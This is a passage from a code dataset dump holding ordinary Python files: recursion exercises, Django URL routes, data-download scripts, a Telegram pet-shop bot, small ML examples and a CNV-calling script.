'Sorted linear collection',\n left: int, right: int) -> int:\n \"\"\"Returns index if ints[index] == index\"\"\"\n pos = (left + right) // 2\n if ints[pos] == pos:\n return pos\n elif ints[pos] < pos:\n return find_magic_index(ints, pos + 1, right)\n else:\n return find_magic_index(ints, left, pos - 1)\n\n\ndef generate_brackets(n):\n for i in range(1, n + 1):\n yield from _generate_brackets('', 0, 0, i)\n\n\ndef _generate_brackets(s, op, cl, pairs):\n if op == pairs and cl == pairs:\n yield s\n else:\n if op < pairs:\n yield from _generate_brackets(s + '(', op + 1, cl, pairs)\n if cl < op:\n yield from _generate_brackets(s + ')', op, cl + 1, pairs)\n\n\nclass Color(Enum):\n black = 1\n red = 2\n blue = 3\n\n\ndef flood_fill(screen: list, x, y, old_color: Color, new_color: Color):\n if x < 0 or x == len(screen[0]) or y < 0 or y == len(screen):\n return\n if screen[y][x] != old_color:\n return\n screen[y][x] = new_color\n flood_fill(screen, x - 1, y, old_color, new_color)\n flood_fill(screen, x + 1, y, old_color, new_color)\n flood_fill(screen, x, y + 1, old_color, new_color)\n flood_fill(screen, x, y - 1, old_color, new_color)\n\n\ndef make_change(n, denom):\n next_denom = 0\n if denom == 25:\n next_denom = 10\n elif denom == 10:\n next_denom = 5\n elif denom == 5:\n next_denom = 1\n else:\n return 1\n ways = 0\n i = 0\n while i * denom <= n:\n ways += make_change(n - i * denom, next_denom)\n i += 1\n return ways\n\n\ndef place_queens(n=8):\n cols = range(n)\n for vec in permutations(cols):\n if (n == len(set(vec[i] + i for i in cols))\n == len(set(vec[i] - i for i in cols))):\n yield vec\n\n\nclass Box():\n def __init__(self, size=1):\n self.size = size\n\n def can_be_above(self, box):\n return box.size > self.size\n\n def __eq__(self, other):\n return self.size == other.size\n\n def __hash__(self):\n return hash(self.size)\n\n\ndef create_box_stack(boxes: list, bottom: Box, stack_map: dict):\n if bottom and bottom in stack_map:\n return stack_map[bottom]\n max_height = 0\n max_stack = None\n for i in range(len(boxes)):\n if boxes[i].can_be_above(bottom):\n new_stack = create_box_stack(boxes, boxes[i], stack_map)\n new_height = len(new_stack)\n if new_height > max_height:\n max_stack = new_stack\n max_height = new_height\n if not max_stack:\n max_stack = []\n if bottom:\n max_stack.append(bottom)\n stack_map[bottom] = max_stack\n return deepcopy(max_stack)","sub_path":"recursion.py","file_name":"recursion.py","file_ext":"py","file_size_in_byte":4291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"331697451","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.listproduits),\n path('listproduits/', views.listproduits, name='1'),\n path('addproduits/', views.addproduits, name='2'),\n path('updateproduits/', views.updateproduits, name='3'),\n path('deleteproduits/', views.deleteproduits, name='4'),\n path('addapprovs/', views.addapprovs, name='5'),\n path('modifapprovs/', views.modifapprovs, name='6'),\n path('listapprovs/', views.listapprovs, name='7'),\n path('decisionapprovs/', views.decisionapprovs, name='8'),\n path('signin/', views.signin, name='9'),\n path('signup/', views.signup, name='10'),\n path('listuser', views.listuser, name='11'),\n path('listrmgapprovs/', views.listrmgapprovs, name='12'),\n path('listinferiorapprovs/', views.listinferiorapprovs, name='13'),\n path('allapprovs/', views.allapprovs, name='14')\n\n]","sub_path":"suivi_budgetaire/stock/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"591433385","text":"# coding=utf8\n\n# 1、导入库\nimport requests\nimport json\nimport csv\nimport os\n\n\ndef GetA1DataCollectionManage(url, JsonFileName, CsvFileName):\n AllWell_JSON = requests.get(url)\n JsonStr = AllWell_JSON.text\n # 替换字符串中的换行\n JsonStr = JsonStr.replace(\"\\\\r\\\\n\", \"\")\n # 替换日期中的时间00:00:00部分\n JsonStr = JsonStr.replace(\" 00:00:00\", \"\")\n \n aa = json.loads(JsonStr) # 通过JSON模块转化为dict\n\n # 写入文件\n # ensure_ascii=False 不将字符串转化为ascii输出,解决中文输出问题\n # indent=0 格式化输出参数,可为负数、0、正数、\"\"、\"\\t\"等\n with open(JsonFileName, 'w') as f:\n json.dump(aa, f, ensure_ascii=False, indent=0)\n \n print(\"当前的网页网址:%s\" % AllWell_JSON.url)\n print(\"下载完成!\")\n\n result = aa[\"result\"]\n\n # open函数中encoding参数设为'utf-8'时,文件以'utf-8'编码格式保存文件,Excel打开csv文件中文乱码\n # encoding设为'utf_8_sig',文件以'utf-8-bom'编码格式保存文件,Excel打开csv文件中文正常显示\n # encoding设为'gb18030',文件以'gb18030'编码格式保存文件,Excel打开csv文件中文正常显示\n with open(CsvFileName, 'w', newline='', encoding='gb18030') as f:\n writer = csv.writer(f)\n writer.writerow(result[0].keys())\n for row in result:\n writer.writerow(row.values())\n\n print(\"转换完成\")\n pass\n\n\nif __name__ == \"__main__\":\n # 下载所有井基本信息\n AllWell_Url = \"http://10.86.13.221/jsvc/service/A1_dataStatisBusiness/getA1DataCollectionManage?\"\n # AllWell_Url = \"http://10.86.13.221/jsvc/service/A1_dataStatisBusiness/getA1DataCollectionManagePage?page=1&rows=5\"\n AllWell_JsonFileName = r\"F:\\冀东油田数据库应用系统\\冀东油田-数据库-提取地址\\A1-2.0数据\\getA1DataCollectionManage.json\"\n AllWell_CsvFileName = r\"F:\\冀东油田数据库应用系统\\冀东油田-数据库-提取地址\\A1-2.0数据\\getA1DataCollectionManage.csv\"\n if os.path.isfile(AllWell_JsonFileName) is False or os.path.isfile(AllWell_CsvFileName) is False:\n GetA1DataCollectionManage(AllWell_Url, AllWell_JsonFileName,AllWell_CsvFileName)\n\n # 给定wellid参数,下载井的单井卡片\n WellCardData_Url = \"http://10.86.13.221/jsvc/service/A1_dataManagement/getWellCardDataByWellId?wellId=\"\n WellCard_JsonFileName = r\"F:\\冀东油田数据库应用系统\\冀东油田-数据库-提取地址\\A1-2.0数据\\单井卡片\\单井卡片.json\"\n WellCard_CsvFileName = r\"F:\\冀东油田数据库应用系统\\冀东油田-数据库-提取地址\\A1-2.0数据\\单井卡片\\单井卡片.csv\"\n\n with open(AllWell_JsonFileName, 'r', 1) as f:\n AllWell_Json = json.load(f)\n\n result = {\"resultCode\": 0, \"result\": [], \"msgId\": \"\", \"success\": True}\n i = 0\n print(\"开始下载单井卡片!\")\n if os.path.isfile(WellCard_JsonFileName) is False:\n # with open(AllWell_JsonFileName, 'r', 1) as f:\n # WellCard_Json = json.load(f)\n # f.close()\n # ToDoList = \"\"\n\n for row in AllWell_Json[\"result\"]:\n JsonStr = requests.get(WellCardData_Url + row[\"WELL_ID\"])\n bb = JsonStr.json()\n result[\"result\"] += bb[\"result\"]\n print(i, bb[\"result\"][0][\"WELL_COMMON_NAME\"])\n i += 1\n# if i == 30:\n# break\n pass\n \n str1 = json.dumps(result, ensure_ascii=False)\n str1 = str1.replace(\"\\\\r\\\\n\", \"\")\n# str1 = str1.replace(\"\\\\r\", \"\")\n# str1 = str1.replace(\"\\\\n\", \"\")\n# str1 = str1.replace(\"\\r\\n\", \"\")\n# str1 = str1.replace(\"\\r\", \"\")\n# str1 = str1.replace(\"\\n\", \"\")\n str1 = str1.replace(\" 00:00:00\", \"\")\n result = json.loads(str1)\n\n with open(WellCard_JsonFileName, 'w') as f:\n json.dump(result, f, ensure_ascii=False, indent=0)\n# json.dump(result, f, ensure_ascii=False, indent=0)\n \n print(\"下载完成!\")\n\n # open函数中encoding参数设为'utf-8'时,文件以'utf-8'编码格式保存文件,Excel打开csv文件中文乱码\n # encoding设为'utf_8_sig',文件以'utf-8-bom'编码格式保存文件,Excel打开csv文件中文正常显示\n # encoding设为'gb18030',文件以'gb18030'编码格式保存文件,Excel打开csv文件中文正常显示\n with open(WellCard_CsvFileName, 'w', newline='', encoding='gb18030') as f:\n writer = csv.writer(f)\n writer.writerow(result[\"result\"][0].keys())\n for row in result[\"result\"]:\n # print(row.values())\n writer.writerow(row.values())\n\n print(\"转换完成\")\n","sub_path":"Json/下载A1井基本信息.py","file_name":"下载A1井基本信息.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"548861519","text":"import seaborn as sns\nimport pandas as pd\nimport matplotlib.pyplot as plt\ndf = pd.read_csv('crimeRatesByState2005.csv')\n\ndf1 = df[df.state != \"United States\"]\ndf1 = df1[df1.state != \"District of Columbia\"]\ndf1 = df1.drop(['state'], axis=1)\ndf1 = df1.drop(['population'], axis = 1)\ng = sns.pairplot(df1, diag_kind='kde')\nplt.show()\n","sub_path":"DVT/chapter04/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"393267960","text":"import sklearn.datasets\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom random import randint\nfrom sklearn.metrics import accuracy_score\n\nbreast_cancer = sklearn.datasets.load_breast_cancer()\n\nX = breast_cancer.data\nY = breast_cancer.target\n\ndata = pd.DataFrame(breast_cancer.data, columns=breast_cancer.feature_names)\ndata['class'] = breast_cancer.target\n\nX = data.drop('class', axis=1)\nY = data['class']\n\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.1, stratify = Y, random_state=1)\n\nX_binarised_train = X_train.apply(pd.cut, bins=2, labels=[1,0])\nX_binarised_test = X_test.apply(pd.cut, bins=2, labels=[1,0])\n\nX_binarised_test = X_binarised_test.values\nX_binarised_train = X_binarised_train.values\n\nclass MPNeuron:\n \n def __init__(self):\n self.b = None\n \n def model(self, x):\n return(sum(x) >= self.b)\n \n def predict(self, X):\n Y = []\n for x in X:\n result = self.model(x)\n Y.append(result)\n return np.array(Y)\n \n def fit(self, X, Y):\n accuracy = {}\n \n for b in range(X.shape[1] + 1):\n self.b = b\n Y_pred = self.predict(X)\n accuracy[b] = accuracy_score(Y_pred, Y)\n \n best_b = max(accuracy, key = accuracy.get)\n self.b = best_b\n \n print('Optimal value of b is', best_b)\n print('Highest accuracy is', accuracy[best_b])\n\nmp_neuron = MPNeuron()\nmp_neuron.fit(X_binarised_train, Y_train)\n\nY_test_pred = mp_neuron.predict(X_binarised_test)\naccuracy_test = accuracy_score(Y_test_pred, Y_test)","sub_path":"Python MP Neuron Perceptron/0214_MPNeuronAndPerceptron-pythonfile.py","file_name":"0214_MPNeuronAndPerceptron-pythonfile.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"475105534","text":"import re\nimport os\nimport argparse\nimport sys\n\ndef parse_logs(filepath):\n if os.path.exists(filepath):\n pattern = re.compile(('ERROR|WARNING'))\n with open(filepath) as f:\n log = f.read()\n errors = re.findall(pattern, log)\n if errors :\n for e in errors:\n if (e == 'ERROR'):\n print(\"Error found\")\n elif(e == 'WARNING'):\n print('WARNING Found')\n else:\n print(\"No errors or WARNING found\")\n else:\n print(f\"filepath {filepath} doesnt exist\")\n\n\ndef logs_wrapper(args):\n parse_logs(args.filepath)\n\ndef main():\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers()\n\n logs_parser = subparsers.add_parser('getlogs')\n logs_parser.add_argument('filepath')\n logs_parser.set_defaults(func=logs_wrapper)\n\n args = parser.parse_args(sys.argv[1:])\n args.func(args)\n\nif __name__ == '__main__':\n main()\n \n ","sub_path":"mypycli/mytool.py","file_name":"mytool.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"336522700","text":"import re, os\n\n__all__ = [\n \"StringMatcher\",\n \"MatchList\",\n \"FileMatcher\"\n]\n\nclass StringMatcher:\n \"\"\"\n Defines a simple filter that applies to a file and determines whether or not it matches the pattern\n \"\"\"\n\n def __init__(self, match_patterns, negative_match = False):\n if isinstance(match_patterns, str):\n pattern = re.compile(match_patterns)\n self.matcher = lambda f, p = pattern: re.match(p, f)\n elif hasattr(re, \"Pattern\") and isinstance(match_patterns, re.Pattern): # re.Pattern is new as of python3.7...\n self.matcher = lambda f, p = match_patterns: re.match(p, f)\n elif type(match_patterns).__name__==\"SRE_Pattern\": # pre 3.7\n self.matcher = lambda f, p = match_patterns: re.match(p, f)\n elif isinstance(match_patterns, StringMatcher):\n self.matcher = match_patterns.matches\n elif callable(match_patterns):\n self.matcher = match_patterns\n else:\n ff = type(self)\n match_patterns = tuple(ff(m) if not isinstance(m, StringMatcher) else m for m in match_patterns)\n self.matcher = lambda f, p = match_patterns: all(m.matches(f) for m in p)\n\n self.negate = negative_match\n\n def matches(self, f):\n m = self.matcher(f)\n if self.negate:\n m = not m\n return m\n\nclass MatchList(StringMatcher):\n \"\"\"\n Defines a set of matches that must be matched directly (uses `set` to make this basically a constant time check)\n \"\"\"\n\n def __init__(self, *matches, negative_match = False):\n self.match_list = set(matches)\n super().__init__(lambda f, m=self.test_match: m(f), negative_match = negative_match)\n def test_match(self, f):\n return f in self.match_list\n\nclass FileMatcher(StringMatcher):\n \"\"\"\n Defines a filter that uses StringMatcher to specifically match files\n \"\"\"\n\n def __init__(self, match_patterns, negative_match = False, use_basename = False):\n super().__init__(match_patterns, negative_match = negative_match)\n self.use_basename = use_basename\n\n def matches(self, f):\n f_name = f if not self.use_basename else os.path.basename(f)\n return super().matches(f_name)","sub_path":"McUtils/Misc/FileMatcher.py","file_name":"FileMatcher.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"572100253","text":"import re\nfrom pprint import pprint\n\ndef get_ip_from_cfg(filename):\n with open(filename) as f:\n text = f.read()\n res = []\n regex = r'ip address ((?:\\d+\\.){3}\\d) ((?:\\d+\\.){3}\\d+)'\n match = re.finditer(regex, text, re.DOTALL)\n for m in match:\n res.append(m.groups())\n return res\n \nfin_tuple = get_ip_from_cfg('config_r1.txt')\npprint(fin_tuple)\n","sub_path":"exercises/15_module_re/task_15_1.py","file_name":"task_15_1.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"362659514","text":"# по ссылке можно реализовать видеотрансляцию, а также информацию о родителях, и т.п.\n\nfrom typing import Dict\n\nimport telebot\nimport data\n\nlanguage = [];\nchat_id = dict()\nchat_index = 0;\n\nshow_time_index = [] # False\nbuy_time_index = [] # False\nwromg_attemp = [] # 0\navailable_animal = 5\navailble_attemp = 3\n\nanimals = {\n \"1\": \"Алекс: \\n\\thttps://vk.com/video?q=%D1%89%D0%B5%D0%BD%D0%BE%D0%BA&z=video-67991642_456247336\",\n \"2\": \"Бим: \\n\\thttps://vk.com/video?q=%D1%89%D0%B5%D0%BD%D0%BE%D0%BA&z=video-67991642_456247336\",\n \"3\": \"Ватсон: \\n\\thttps://vk.com/video?q=%D1%89%D0%B5%D0%BD%D0%BE%D0%BA&z=video-67991642_456247336\",\n \"4\": \"Голд: \\n\\thttps://vk.com/video?q=%D1%89%D0%B5%D0%BD%D0%BE%D0%BA&z=video-67991642_456247336\",\n \"5\": \"Добби: \\n\\thttps://vk.com/video?q=%D1%89%D0%B5%D0%BD%D0%BE%D0%BA&z=video-67991642_456247336\"\n}\n\nbot = telebot.TeleBot(data.token)\n\n\ndef order_text(message):\n global language\n if language[chat_id[message.chat.id]]:\n return \"Спасибо за Ваш заказ, в ближайше.\"\n else:\n return \"Thanks for your order. Our specialist will contact you.\"\n\n\ndef start_text(message):\n global language\n if language[chat_id[message.chat.id]]:\n return \"Это онлайн питомник Селена Вайт.\\n Воспользуйтесь /help для информации о доступных командах\"\n else:\n return \"This is a online zoo market Selena White.\\nTry /help for main commands.\"\n\n\ndef help_text(message):\n global language\n if language[chat_id[message.chat.id]]:\n return \"/show - показать животного(ых)\\n\" \\\n \"/contact - для связи с нашим специалистом\\n\" \\\n \"/buy - для покупки животного\\n\" \\\n \"/change_language - изменить язык с русского на английский и обратно\"\n else:\n return \"/show - show animals\\n\" \\\n \"/contact - our specialist will contact you\\n\" \\\n \"/buy - buy animal\\n\" \\\n \"/change_language - change Russian to English and back\"\n\n\ndef cotact_text(message):\n global language\n if language[chat_id[message.chat.id]]:\n return \"В ближайшее время наш специалист с Вами свяжется.\"\n else:\n return \"Our specialist will contact you\"\n\n\ndef sorry_text(message):\n global language\n if language[chat_id[message.chat.id]]:\n return \"Неопознанное сообщение. Пожалуйста воспользуйтесь пожалуйста /help\"\n else:\n return \"Sorry, unknown message. Try /help for detail\"\n\n\ndef send_message_value_error(message):\n global language\n if language[chat_id[message.chat.id]]:\n bot.send_message(message.chat.id,\n \"Введите пожалуйста число.\\n\"\n \"Сейчас доступно \" +\n str(available_animal) +\n \" животных\\n\"\n \"У Вас осталось \" +\n str(availble_attemp - wromg_attemp[chat_id[message.chat.id]] - 1) +\n \" попыток\\n\")\n else:\n bot.send_message(message.chat.id,\n \"Sorry, but this isn't number.\\nNow available animals: \" +\n str(available_animal) +\n \"\\nPlease try again.\\n\"\n \"You have \" +\n str(availble_attemp - wromg_attemp[chat_id[message.chat.id]] - 1) +\n \" attempts left\")\n\n\ndef send_message_show(message):\n global bot\n if language[chat_id[message.chat.id]]:\n bot.send_message(message.chat.id,\n \"Сейчас доступно \" + str(available_animal) +\n \" животных\\nВведите 'All' для того чтобы посмотреть \"\n \"всех или номер для просмотра конкретного животного.\")\n else:\n bot.send_message(message.chat.id,\n \"Now available animals: \" +\n str(available_animal) +\n \"\\nEnter 'All' to view all animals or animal number.\")\n\n\ndef send_message_buy(message):\n global bot\n if language[chat_id[message.chat.id]]:\n bot.send_message(message.chat.id,\n \"Сейчас доступно: \" +\n str(available_animal) +\n \"животных\\nВведите номер для покупки.\")\n else:\n bot.send_message(message.chat.id,\n \"Now available animals: \" +\n str(available_animal) +\n \"\\nEnter animal number.\")\n\n\ndef check_chat(message):\n global chat_id\n if message.chat.id not in chat_id:\n global show_time_index\n global buy_time_index\n global wromg_attemp\n global chat_index\n global language\n chat_id[message.chat.id] = chat_index\n chat_index += 1\n show_time_index.append(False)\n buy_time_index.append(False)\n wromg_attemp.append(0)\n language.append(1)\n\n\ndef show_all(message, show_time_index):\n global bot\n for i in range(len(animals)):\n bot.send_photo(message.chat.id, open(\"D:/_USE_/Project_2/Bot_3/img/\" + str(i+1) + \".jpg\", 'rb'));\n bot.send_message(message.chat.id, animals[str(i+1)])\n show_time_index[chat_id[message.chat.id]] = False\n\n\ndef show_time(message):\n global availble_attemp;\n global show_time_index\n global wromg_attemp;\n\n if message.text in [\"All\", \"all\", \"ALL\"]:\n show_all(message, show_time_index)\n return 0\n\n try:\n message_text_int = int(message.text)\n except ValueError:\n send_message_value_error(message)\n wromg_attemp[chat_id[message.chat.id]] += 1\n return 0\n\n if 0 >= message_text_int or message_text_int > available_animal:\n send_message_value_error(message)\n wromg_attemp[chat_id[message.chat.id]] += 1\n return 0\n else:\n bot.send_photo(message.chat.id, open(\"D:/_USE_/Project_2/Bot_3/img/\"+message.text+\".jpg\", 'rb'));\n bot.send_message(message.chat.id, animals[message.text])\n show_time_index[chat_id[message.chat.id]] = False\n return 0\n\n\ndef buy_time(message):\n global availble_attemp\n global buy_time_index\n global wromg_attemp\n global language\n try:\n message_text_int = int(message.text)\n except ValueError:\n send_message_value_error(message)\n wromg_attemp[chat_id[message.chat.id]] += 1\n return 0\n\n if 0 >= message_text_int or message_text_int > available_animal:\n send_message_value_error(message)\n wromg_attemp[chat_id[message.chat.id]] += 1\n return 0\n else:\n bot.send_message(message.chat.id, order_text(message))\n buy_time_index[chat_id[message.chat.id]] = False\n return 0\n\n\ndef change_language(message):\n global language\n if language[chat_id[message.chat.id]]:\n language[chat_id[message.chat.id]] = 0\n bot.send_message(message.chat.id, \"Language has been change to English\")\n else:\n language[chat_id[message.chat.id]] = 1\n bot.send_message(message.chat.id, \"Язык был измененён на Русский\")\n\n@bot.message_handler(commands=[\"start\"])\ndef handle_text(message):\n print(message.chat.id)\n check_chat(message)\n bot.send_message(message.chat.id, start_text(message))\n\n\n@bot.message_handler(commands=[\"help\"])\ndef handle_text(message):\n print(message.chat.id)\n check_chat(message)\n bot.send_message(message.chat.id, help_text(message))\n\n\n@bot.message_handler(commands=[\"change_language\"])\ndef handle_text(message):\n print(message.chat.id)\n check_chat(message)\n change_language(message)\n\n\n@bot.message_handler(commands=[\"show\"])\ndef handle_text(message):\n print(message.chat.id)\n check_chat(message)\n send_message_show(message)\n global show_time_index, buy_time_index, chat_id\n show_time_index[chat_id[message.chat.id]] = True\n buy_time_index[chat_id[message.chat.id]] = False\n wromg_attemp[chat_id[message.chat.id]] = 0;\n\n\n@bot.message_handler(commands=[\"buy\"])\ndef handle_text(message):\n print(message.chat.id)\n check_chat(message)\n send_message_show(message)\n global buy_time_index, show_time_index, chat_id\n buy_time_index[chat_id[message.chat.id]] = True\n show_time_index[chat_id[message.chat.id]] = False\n wromg_attemp[chat_id[message.chat.id]] = 0;\n\n\n@bot.message_handler(commands=[\"contact\"])\ndef handle_text(message):\n print(message.chat.id)\n check_chat(message)\n mes = cotact_text(message)\n bot.send_message(message.chat.id, mes)\n\n\n@bot.message_handler(content_types=[\"text\"])\ndef handle_text(message):\n print(message.chat.id)\n check_chat(message)\n global show_time_index, buy_time_index, wromg_attemp, chat_id\n if availble_attemp <= wromg_attemp[chat_id[message.chat.id]]:\n buy_time_index[chat_id[message.chat.id]] = False\n show_time_index[chat_id[message.chat.id]] = False\n wromg_attemp[chat_id[message.chat.id]] = 0\n bot.send_message(message.chat.id, sorry_text(message))\n elif show_time_index[chat_id[message.chat.id]]:\n show_time(message)\n elif buy_time_index[chat_id[message.chat.id]]:\n buy_time(message)\n else:\n bot.send_message(message.chat.id, sorry_text(message))\n\n\nbot.polling(none_stop=True, interval=0)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"158915917","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\"\"\"\n File Name: online_call.py\n Description:\n\nCreated by Yu Liu on 2019/9/29 10:57 PM.\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport multiprocessing as mp\nimport h5py\n\nimport online.GPUtil as GPU\nimport glob\nimport logging\n\nimport os\nimport time\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlogger = logging.getLogger(__name__)\n\n\nclass CNVNetwork:\n\n def __init__(self, weight_path, win_size, n_feat, n_class, drop, _blocks, fc_size, l2ratio, temp):\n import tensorflow as tf\n from keras import backend as K\n from model import cnv_net\n\n K.clear_session()\n config = tf.ConfigProto()\n config.gpu_options.per_process_gpu_memory_fraction = 0.2 # (2core)0.3->0.15(4core)\n sess = tf.Session(config=config)\n K.set_session(sess)\n\n model_name = 'cnvnet'\n self.model = cnv_net(win_size, n_feat, n_class, filters=32, kernel_size=128, strides=1, pool_size=2,\n pool_stride=2, drop=drop, blocks=_blocks, fc_size=fc_size,\n kernel_regular_l2=l2ratio, temperature=temp, m_name=model_name)\n self.model.load_weights(weight_path)\n\n def predict(self, in_data, batch_size=None):\n\n with h5py.File(in_data, 'r') as i_fn_read:\n i_fn_pred_meta = i_fn_read.get('pred_meta').value\n i_fn_pred_feat = i_fn_read.get('pred_feat').value\n i_feat_arr = np.array(i_fn_pred_feat)\n del i_fn_pred_feat\n\n ypred = self.model.predict(i_feat_arr, batch_size=batch_size)\n del i_feat_arr\n return i_fn_pred_meta, ypred, in_data\n\n\ndef job_wraper(func_param):\n return pool_job(*func_param)\n\n\ndef pool_job(weight_path, win_size, n_feat, n_class, drop, _blocks, fc_size, in_data, batch_size,\n l2rate, temperature_scale):\n model = CNVNetwork(weight_path, win_size, n_feat, n_class, drop, _blocks, fc_size, l2rate, temperature_scale)\n return model.predict(in_data, batch_size)\n\n\ndef online_call_mp_gpu_1(online_seg_data_root_dir, online_call_out_root_dir, model_in_root_dir,\n n_win_size=1000, n_feat=13, n_class=3,\n epochs=100, batch=1024, learn_rate=0.001, drop=0.2,\n fc_size=64, blocks='4_4_3', step_size=200,\n l2r=1e-4, temperature=5, lbl_smt_frac=0.1, pw=0,\n sample_id='NA12878', chr_id='1', min_ratio=0.1, seg_range='a', n_proc=10):\n\n \n filters=32\n kernel_size=128\n strides=1\n pool_size=2\n pool_stride=2\n \n _blocks = tuple(int(x) for x in blocks.split('_'))\n def out_name():\n str_blocks = [str(x) for x in blocks.split('_')]\n str_blk = ''.join(str_blocks)\n return 'b{0}_ep{1}_lr{2:.3f}_dr{3:.1f}_fc{4}_' \\\n 'blk{5}_win{6}_l2r{7}_temp{8}_lblsmt{9}_pw{10}_' \\\n 'filters_{11}_kernelsize{12}_strides{13}_poolsize{14}_poolstride{15}'.format(batch,\n epochs,\n learn_rate,\n drop,\n fc_size,\n str_blk,\n n_win_size,\n str(l2r),\n temperature,\n int(lbl_smt_frac) if lbl_smt_frac == 0 else lbl_smt_frac,\n pw,\n filters,\n kernel_size,\n strides,\n pool_size,\n pool_stride)\n\n # set enviornment\n time.sleep(10)\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n logger.info('waiting available gpu device...')\n while True:\n gpu_id_lst = GPU.getFirstAvailable(order='random', maxMemory=0.001, maxLoad=0.001, attempts=50, interval=60)\n if len(gpu_id_lst) > 0:\n break\n logger.info('processing on device id {}...'.format(gpu_id_lst[0]))\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(gpu_id_lst[0])\n\n model_name = 'cnvnet'\n model_weight_fn = os.path.join(model_in_root_dir, out_name() + '-' + model_name + '.hdf5')\n if not os.path.exists(model_weight_fn):\n raise FileNotFoundError('model weight file not found. {}'.format(model_weight_fn))\n\n # load data\n # default: online_seg_data_root_dir = '/zfssz2/ST_MCHRI/BIGDATA/PROJECT/NIPT_CNV/f_cnv_out/online'\n online_seg_data_subroot_dir = os.path.join(online_seg_data_root_dir, sample_id + '/data')\n if not os.path.isdir(online_seg_data_subroot_dir):\n raise FileNotFoundError('No segments generated for sample {}, chr {}'.format(sample_id, chr_id))\n\n part_fname = 'win{0}_step{1}_r{2:.2f}_chr{3}_seg_'.format(n_win_size, step_size, min_ratio, chr_id)\n # create out dir\n # default: online_call_out_root_dir = '/zfssz2/ST_MCHRI/BIGDATA/PROJECT/NIPT_CNV/f_cnv_out/online'\n online_call_out_subroot_dir = os.path.join(online_call_out_root_dir, sample_id + '/cnv_call')\n if not os.path.isdir(online_call_out_subroot_dir):\n os.makedirs(online_call_out_subroot_dir)\n call_out_fn = os.path.join(online_call_out_subroot_dir,\n 'win{0}_step{1}_r{2:.2f}_chr{3}-cnv-call-'.format(\n n_win_size, step_size, min_ratio, chr_id))\n if seg_range != 'a': # if not whole chr\n part_fname = part_fname + 'p-' + seg_range + '_'\n call_out_fn = call_out_fn + 'p-' + seg_range + '-'\n else:\n part_fname = part_fname + 'a_'\n call_out_fn = call_out_fn + 'a-'\n\n call_out_fn = call_out_fn + 'result-mp-gpu-pw{}.csv'.format(pw)\n\n if os.path.exists(call_out_fn):\n os.remove(call_out_fn)\n\n gap_h5_fn = os.path.join(online_seg_data_subroot_dir, part_fname+'gap.h5')\n gap_pred = None\n if os.path.exists(gap_h5_fn):\n with h5py.File(gap_h5_fn, 'r') as gap_fn_read:\n gap_obj = gap_fn_read.get('gap')\n if gap_obj:\n gap_result = gap_obj.value\n # logger.info('gap_result shape: {}'.format(gap_result.shape))\n tmp_arr = np.full((gap_result.shape[0], 4), -1)\n # tmp_arr[:] = np.nan\n gap_pred = np.concatenate((gap_result, tmp_arr), axis=1)\n del tmp_arr\n\n unpred_h5_fn_list = glob.glob(os.path.join(online_seg_data_subroot_dir, part_fname+'unpred_*'))\n f_unpred_arr = None\n for i_unpred_fn in unpred_h5_fn_list:\n with h5py.File(i_unpred_fn, 'r') as i_uppred_fn_read:\n i_unpred_meta = i_uppred_fn_read.get('unpred_meta').value\n i_unpred_meta_arr = np.array(i_unpred_meta)\n # logger.info('i_unpred_meta_arr shape: {}'.format(i_unpred_meta_arr.shape))\n tmp_arr = np.full((i_unpred_meta_arr.shape[0], 4), -1)\n # tmp_arr[:] = np.nan\n\n if f_unpred_arr is None:\n f_unpred_arr = np.concatenate((i_unpred_meta_arr, tmp_arr), axis=1)\n else:\n unpred_arr = np.concatenate((i_unpred_meta_arr, tmp_arr), axis=1)\n f_unpred_arr = np.concatenate((f_unpred_arr, unpred_arr), axis=0)\n\n pred_h5_fn_list = glob.glob(os.path.join(online_seg_data_subroot_dir, part_fname+'pred_*'))\n\n logger.info('calling cnv...')\n f_pred_res = None\n total_fn = len(pred_h5_fn_list)\n\n func_parmas = []\n for i_fn in pred_h5_fn_list:\n func_parmas.append((model_weight_fn, n_win_size, n_feat,\n n_class, drop, _blocks, fc_size, i_fn, batch, l2r, temperature))\n\n with mp.Pool(n_proc) as p:\n results = p.imap(job_wraper, func_parmas)\n for idex, (i_pred_meta, i_ypred, i_fn) in enumerate(results):\n logger.info('finished {}/{}, {}'.format(idex+1, total_fn, i_fn))\n assert len(i_pred_meta) == i_ypred.shape[0]\n ypred_l = np.argmax(i_ypred, axis=1)\n\n if f_pred_res is None:\n f_pred_res = np.concatenate((np.array(i_pred_meta), i_ypred, ypred_l[:, np.newaxis]), axis=1)\n else:\n i_pred_res = np.concatenate((np.array(i_pred_meta), i_ypred, ypred_l[:, np.newaxis]), axis=1)\n f_pred_res = np.concatenate((f_pred_res, i_pred_res), axis=0)\n\n logger.info('combining and sorting results...')\n # check\n # 